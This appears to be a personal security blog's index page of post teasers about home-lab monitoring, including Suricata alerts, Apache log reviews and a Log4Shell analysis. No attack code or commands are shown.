by Fred Theilig – @fmtheilig Occasionally mentioned in a podcast, I was only tangentially aware of the Security BSides conferences. More notice was taken while attending DEF CON this past summer, which…
Udemy for free
It was brought to my attention that Rhode Island has partnered with Udemy through gale. If you own a library card, read this! Udemy is one of my ‘go-tos’ for getting up…
Threat Hunting for the Uninitiated
By Fred Theilig – @fmtheilig I took a look at my UniFi wifi and discovered the following: Ah! A rogue device! Did a son bring a new device into the house? Did…
A (slightly) Deeper Dive into Weird Apache Logs
By Fred Theilig – @fmtheilig My IDS alerted me to strange behavior (obfuscated Log4j) on my web server, but rather than investigate through Security Onion, I went straight to the logs. Greping…
Banner Capture for Fun and Profit
On January 30th I saw the single suricata alert “ET SCAN Zmap User-Agent (Inbound)”. This is a low severity alert and the target was my web server. Let’s see what that’s all…
WordPress Back ups
We get caught up trying to get something to work, that we forget to back it up. I’ve done it, and still do it…until something happens and I’m kicking myself in the…
A Whole Lot of Nothings
On August 18th IP address 23.227.202.82 (Tampa, Florida) triggered the suricata alert “ET SCAN MS Terminal Server Traffic on Non-standard Port” on my web server. This is apparently an attempted information leak,…
Torrent in Sheep’s Clothing
I discovered that my son was using BitTorrent. The alert GPL P2P BitTorent Transfer showed up in Security Onion in the 100’s of thousands. He said he uses it to download Linux…
WUDO and, well, that was dumb
Allow me to introduce you to WUDO. WUDO is Windows Update Delivery Optimization, and not the Western Union Defence Organisation. This is a feature introduced in Windows 10 to cut down on…
An Analysis of a Log4Shell Attack
An interesting thing appeared on my Apache log doorstep in late September. What follows is the actual code received from what I am calling a probable Log4Shell exploit. I was hesitant to…